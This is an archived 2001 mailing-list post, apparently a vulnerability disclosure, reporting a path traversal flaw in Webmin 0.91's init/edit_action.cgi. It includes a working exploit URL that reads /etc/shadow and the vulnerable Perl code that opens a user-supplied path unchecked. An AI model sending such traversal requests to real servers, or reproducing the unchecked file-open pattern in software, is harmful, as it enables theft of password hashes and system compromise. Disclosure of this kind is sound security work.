Hello, I find bug on webmin 0.91. From web: <snip> What is Webmin? Webmin is a web-based interface for system administration for Unix. Using any browser that supports tables and forms (and Java for the File Manager module), you can setup user accounts, Apache, DNS, file sharing and so on. Webmin consists of a simple web server, and a number of CGI programs which directly update system files like /etc/inetd.conf and /etc/passwd. The web server and all CGI programs are written in Perl version 5, and use no non-standard Perl modules. </snip> With this software you can start and stop services with simple user, and edit init scripts. like this: http://www.domain.com:10000/servers/link.cgi/1008341480/init/edit_action.cgi?0+makedev but you can use this: http://www.domain.com:10000/servers/link.cgi/1008341480/init/edit_action.cgi?0+../../../../../etc/shadow The problem reside on init/edit_action.cgi: <snip> open(FILE, $file); while(<FILE>) { $data .= $_; if (/^\s*(['"]?)([a-z]+)\1\)/i) { $hasarg{$2}++; } } close(FILE); </snip> To fix, use your favorite regexp. Yes, you can save file on server... -- Prisacom A. Ramos mailto:aramosat_private Dpto. Admin. Sistemas --
This archive was generated by hypermail 2b30 : Mon Dec 17 2001 - 15:14:56 PST